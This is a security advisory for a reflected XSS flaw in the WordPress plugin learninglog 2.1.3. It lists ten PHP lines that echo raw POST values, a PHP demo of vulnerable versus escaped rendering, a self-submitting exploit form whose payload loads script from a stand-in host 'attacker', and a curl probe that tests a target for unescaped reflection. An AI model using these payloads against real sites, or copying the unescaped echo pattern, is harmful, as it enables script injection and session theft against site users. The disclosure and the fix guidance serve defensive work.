Advisory #: 1065
Title: Reflected XSS in wordpress plugin learninglog v2.1.3
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/learninglog
Downloads: 7510
Vendor Notified: 2016-02-09
Vendor Contact: plugins@wordpress.org
Plugin Name: learninglog
Vulnerability:
There is a reflected XSS vulnerability in the following PHP code in ./learninglog/bp-bulk-import-blogs/bp-bulk-import-blogs.php (source line numbers on the left):

  336: <td><input type="text" id="institution_teacher_name" name="institution_teacher_name" value="<?php echo $_POST["institution_teacher_name"]; ?>" /></td>
  340: <td><input type="text" id="institution_name" name="institution_name" value="<?php echo $_POST["institution_name"]; ?>" /></td>
  344: <td><input type="text" id="institution_adress_1" name="institution_adress_1" value="<?php echo $_POST["institution_adress_1"]; ?>" /></td>
  348: <td><input type="text" id="institution_adress_2" name="institution_adress_2" value="<?php echo $_POST["institution_adress_2"]; ?>" /></td>
  352: <td><input type="text" id="institution_role" name="institution_role" value="<?php echo $_POST["institution_role"]; ?>" /></td>
  356: <td><textarea id="institution_bemerkungen" name="institution_bemerkungen"><?php echo $_POST["institution_bemerkungen"]; ?></textarea></td>
  523: <td><input name="username" id="username" value="<?php echo $_POST["username"]; ?>" /></td>
  527: <td><input name="name" id="name" value="<?php echo $_POST["name"]; ?>" /></td>
  531: <td><input name="email" id="email" value="<?php echo $_POST["email"]; ?>" /></td>
  840: <td colspan="2"><textarea name="textarea_data" cols="90" rows="12" style="width:100%"><?php echo $_POST["textarea_data"]; ?></textarea></td>

Each of these lines echoes a raw $_POST value back into the page with no escaping (no esc_attr() or esc_textarea()), either inside a quoted value="..." attribute, where a double quote in the input closes the attribute and everything after it becomes new markup, or inside a <textarea> body, where a </textarea> sequence does the same. A crafted POST request therefore gets the attacker's markup reflected straight back to the user's browser. institution_teacher_name is the first such parameter in the file; the remaining parameters listed above follow the same pattern.
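The unescaped echo pattern beside a hardened rendering, as an added example that is not the plugin's own code. esc_attr() and esc_textarea() are the WordPress functions a fix would call; the stand-alone substitutes defined at the top are an assumption (htmlspecialchars() with ENT_QUOTES gives the same result for the characters that matter here) so the script runs from the CLI without WordPress. The request array is constructed from the advisory's own payload.

```php
<?php
// Added example, not the plugin's own code: the unescaped echo pattern from
// bp-bulk-import-blogs.php next to a hardened rendering. esc_attr() and
// esc_textarea() are the WordPress functions the fix would use; stand-alone
// substitutes are defined here so this runs without WordPress (assumption:
// htmlspecialchars() with ENT_QUOTES matches their output for ", < and >).

if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
    }
}
if (!function_exists('esc_textarea')) {
    function esc_textarea(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
    }
}

// Attribute context (lines 336-352, 523-531): a raw " closes value="..." and
// whatever follows it is parsed as new markup.
function render_input_vulnerable(string $name, array $post): string {
    return '<td><input type="text" id="' . $name . '" name="' . $name
         . '" value="' . ($post[$name] ?? '') . '" /></td>';
}

function render_input_fixed(string $name, array $post): string {
    $attr = esc_attr($name);
    return '<td><input type="text" id="' . $attr . '" name="' . $attr
         . '" value="' . esc_attr($post[$name] ?? '') . '" /></td>';
}

// Textarea context (lines 356, 840): quotes are harmless here, the break-out
// sequence is </textarea>, so the escaper must neutralise < and >.
function render_textarea_vulnerable(string $name, array $post): string {
    return '<td><textarea id="' . $name . '" name="' . $name . '">'
         . ($post[$name] ?? '') . '</textarea></td>';
}

function render_textarea_fixed(string $name, array $post): string {
    $attr = esc_attr($name);
    return '<td><textarea id="' . $attr . '" name="' . $attr . '">'
         . esc_textarea($post[$name] ?? '') . '</textarea></td>';
}

// Did an injected <script> tag survive into the rendered fragment?
function contains_script(string $html): bool {
    return stripos($html, '<script') !== false;
}

// Constructed request: the attribute break-out is the payload from the
// advisory's exploit form; the textarea case needs </textarea> instead of ".
$post = [
    'institution_teacher_name' => '"><script src=http://attacker/bad.js></script>',
    'institution_bemerkungen'  => '</textarea><script src=http://attacker/bad.js></script>',
];

foreach ([
    ['institution_teacher_name', 'render_input_vulnerable',    'render_input_fixed'],
    ['institution_bemerkungen',  'render_textarea_vulnerable', 'render_textarea_fixed'],
] as [$field, $vulnerable, $fixed]) {
    foreach ([$vulnerable, $fixed] as $renderer) {
        $html = $renderer($field, $post);
        printf("%-26s %-8s %s\n", $renderer, contains_script($html) ? 'INJECTED' : 'safe', $html);
    }
}
```

The vulnerable renderers emit the payload's quote and script tag verbatim, so the browser sees a closed value attribute followed by a live <script> element; the fixed ones emit &quot;, &lt; and &gt;, and the payload stays inert text inside the attribute or textarea. Note that the two contexts need different break-out characters, which is why WordPress ships a separate esc_textarea().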
CVE-ID: Not Released
File: ./learninglog/bp-bulk-import-blogs/bp-bulk-import-blogs.php
Exploit Code:
The exploit targets the first vulnerable parameter that appears in the code (institution_teacher_name); the other parameters listed above are reflected the same way and are candidates as well.

This is an untested autogenerated exploit. The XSS POST exploit is modified from http://blog.portswigger.net/2007/03/exploiting-xss-in-post-requests.html: the payload is HTML-entity-encoded inside the unquoted value of the hidden input (with &#32; for the space), so the browser decodes it to "><script src=http://attacker/bad.js></script> before submitting the form to the target.

<form name=TheForm action=http://[target]/wp-content/plugins/learninglog/bp-bulk-import-blogs/bp-bulk-import-blogs.php method=post>
<input type=hidden name=institution_teacher_name value=&quot;&gt;&lt;script&#32;src=http://attacker/bad.js&gt;&lt;/script&gt;>
</form>
<script>
document.TheForm.submit();
</script>
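Because the exploit above is untested, a practitioner would want to confirm which of the ten parameters actually come back unescaped before relying on it. The following probe is an added example, not part of the advisory: it posts a unique marker containing ", < and > in every parameter at once and classifies each reflection as raw, entity-escaped or absent. Assumptions: the target URL is given on the command line (the direct plugin path used by the exploit form), the page answers a plain POST without further fields or a logged-in session, and the host is one you are authorised to test. With no URL it runs against a constructed sample response built from line 336 of the plugin.

```php
<?php
// Added example, not from the advisory: confirm which parameters are
// reflected unescaped instead of trusting an untested exploit.
// Usage: php probe.php http://[target]/wp-content/plugins/learninglog/bp-bulk-import-blogs/bp-bulk-import-blogs.php
// Assumptions: plain POST is enough to reach the form, no auth needed, host
// is authorised for testing. Without a URL an offline self-check runs.

const PARAMS = [
    'institution_teacher_name', 'institution_name', 'institution_adress_1',
    'institution_adress_2', 'institution_role', 'institution_bemerkungen',
    'username', 'name', 'email', 'textarea_data',
];

// Per-parameter marker carrying the characters needed to break out of a
// quoted attribute (") and a textarea (<, >); unique per parameter so a
// reflection can be attributed to the field that carried it.
function probe_for(string $param): string {
    return '"><xss' . substr(md5($param), 0, 8) . '>';
}

// 'raw'     : marker reflected verbatim, so markup injection is possible
// 'escaped' : reflected only in entity-encoded form (what esc_attr() produces)
// 'absent'  : not reflected at all
function classify_reflection(string $body, string $probe): string {
    if (strpos($body, $probe) !== false) {
        return 'raw';
    }
    if (strpos($body, htmlspecialchars($probe, ENT_QUOTES, 'UTF-8')) !== false) {
        return 'escaped';
    }
    return 'absent';
}

// One POST carrying every parameter; returns the response body.
function post_form(string $url, array $fields): string {
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => http_build_query($fields),
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
    ]);
    $body = curl_exec($ch);
    if ($body === false) {
        throw new RuntimeException('request failed: ' . curl_error($ch));
    }
    curl_close($ch);
    return $body;
}

// Returns [parameter => classification] for one response body.
function classify_all(string $body): array {
    $verdicts = [];
    foreach (PARAMS as $param) {
        $verdicts[$param] = classify_reflection($body, probe_for($param));
    }
    return $verdicts;
}

if ($argc > 1) {
    $fields = [];
    foreach (PARAMS as $param) {
        $fields[$param] = probe_for($param);
    }
    $verdicts = classify_all(post_form($argv[1], $fields));
} else {
    // Constructed sample response: line 336 of the plugin as shipped (raw
    // reflection) next to an esc_attr()-style rendering of institution_name
    // (escaped); every other parameter is absent.
    $raw = probe_for('institution_teacher_name');
    $esc = htmlspecialchars(probe_for('institution_name'), ENT_QUOTES, 'UTF-8');
    $sample = '<td><input type="text" id="institution_teacher_name" name="institution_teacher_name" value="' . $raw . '" /></td>'
            . '<td><input type="text" id="institution_name" name="institution_name" value="' . $esc . '" /></td>';
    $verdicts = classify_all($sample);
}

foreach ($verdicts as $param => $verdict) {
    printf("%-26s %s\n", $param, $verdict);
}
```

A 'raw' verdict for a parameter means the exploit form above, with that parameter's name substituted, has a working injection point; 'escaped' means the field has been fixed; 'absent' usually means the request did not reach the code path that renders the form (a missing submit field, a required session, or a redirect), so it is a reason to look at the response rather than a clean bill of health.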